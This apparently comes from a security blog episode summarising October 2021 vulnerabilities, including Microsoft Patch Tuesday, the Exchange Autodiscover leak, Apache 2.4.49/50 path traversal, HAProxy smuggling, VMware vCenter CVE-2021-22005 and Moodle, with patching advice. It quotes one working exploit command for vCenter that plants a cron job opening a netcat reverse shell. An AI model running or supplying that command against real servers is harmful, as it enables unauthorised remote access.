9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
Hello everyone! This episode will be about relatively recent critical vulnerabilities. Let's start with Microsoft Patch Tuesday for October 2021. Specifically, with the vulnerability that I expected there, but it didn't get there.
"Autodiscover, a protocol used by Microsoft Exchange for automatic configuration of clients such as Microsoft Outlook, has a design flaw that causes the protocol to “leak” web requests to Autodiscover domains outside of the user’s domain but in the same TLD (i.e. Autodiscover.com)." Guardicore Labs acquired multiple Autodiscover domains and have captured 372,072 Windows domain credentials in total. It seems Microsoft have chosen to ignore this issue. No CVE, no Outlook or ActiveSync patches. The only fix is to ban the "Autodiscover." domains on devices.
74 vulnerabilities: 1 Critical, 30 High, 43 Medium.
It is a use-after-free vulnerability in the NtGdiResetDC function of the Win32k driver. A detailed technical description is available in Kasperky Securelist post, but, in short, the vulnerability can lead to leakage of kernel module addresses in the computer’s memory. This vulnerability is being exploited in the wild by APT MysterySnail. All servers and desktops should be updated.
It is necessary to update the Exchanges, but it's not very critical. "Despite the high CVSS score, the advisory does specifically point out that the vulnerability would only be exploitable from an adjacent network". There are no signs of exploitation or exploits yet. Three other vulnerabilities related to Exchange Server were also patched: CVE-2021-41350, a Spoofing vulnerability; CVE-2021-41348, allowing elevation of privilege; and CVE-2021-34453, which is a Denial of Service vulnerability.
DNS servers need to be updated, but real exploitation is unlikely. It was categorized as “Exploitation Less Likely.” It received a CVSSv3 score of 7.2 because an attacker needs a privileged user account in order to exploit this across the network.
This is a good reason to check the Windows desktop updates. "This patch corrects a bug that would allow code execution when a specially crafted Word document is viewed on an affected system. Although Microsoft lists user interaction required, the Preview Pane is also listed as an attack vector." Also take a look at desktop vulnerability Spoofing - Windows Print Spooler (CVE-2021-36970), “Exploitation More Likely”.
And here you can get the whole Vulristics report for Microsoft Patch Tuesday October 2021.
Apache situation is like The Benny Hill Show. First, they released a new version (49) with a critical Path Traversal / RCE vulnerability CVE-2021-41773. Other versions were safe. Fortunately, this was revealed relatively quickly, in 2 weeks. The main stable distributions simply did not have time to add these packages to their repositories. Only fans of installing Apache from source and users of Slackware, Fedora and FreeBSD have suffered. And what was left for the victims to do? Obviously, hurry to roll the new safe version (50). But it turned out that the vulnerability in 50 was not completely fixed. And now the exploit Apache HTTP Server 2.4.50 - Path / Traversal & Remote Code Execution (RCE) is publicly available. Repeat the exercise comrades in rolling now version 51. Everything will definitely be fine there. It's just a circus.
A critical security vulnerability has been disclosed in HAProxy, a widely used open-source load balancer and proxy server, that could be abused by an adversary to possibly smuggle HTTP requests, resulting in unauthorized access to sensitive data and execution of arbitrary commands, effectively opening the door to an array of attacks. A public POC has appeared for the vulnerability.
"On September 21, 2021, VMware disclosed that its vCenter Server is affected by an arbitrary file upload vulnerability—CVE-2021-22005—in the Analytics service. A malicious cyber actor with network access to port 443 can exploit this vulnerability to execute code on vCenter Server. On September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability".
> CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below.
curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444" <https://t.co/wi08brjl3r> pic.twitter.com/bwjMA21ifA
>
> – wvu (@wvuuuuuuuuuuuuu) September 27, 2021
Several RCE exploits for Moodle were released on October 13.
"Moodle is a free and open-source learning management system. it is used for blended learning, distance education, flipped classroom and other e-learning projects in schools, universities, workplaces and other sectors". Surely some organizations make it available on the network perimeter and do not update it regularly.
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P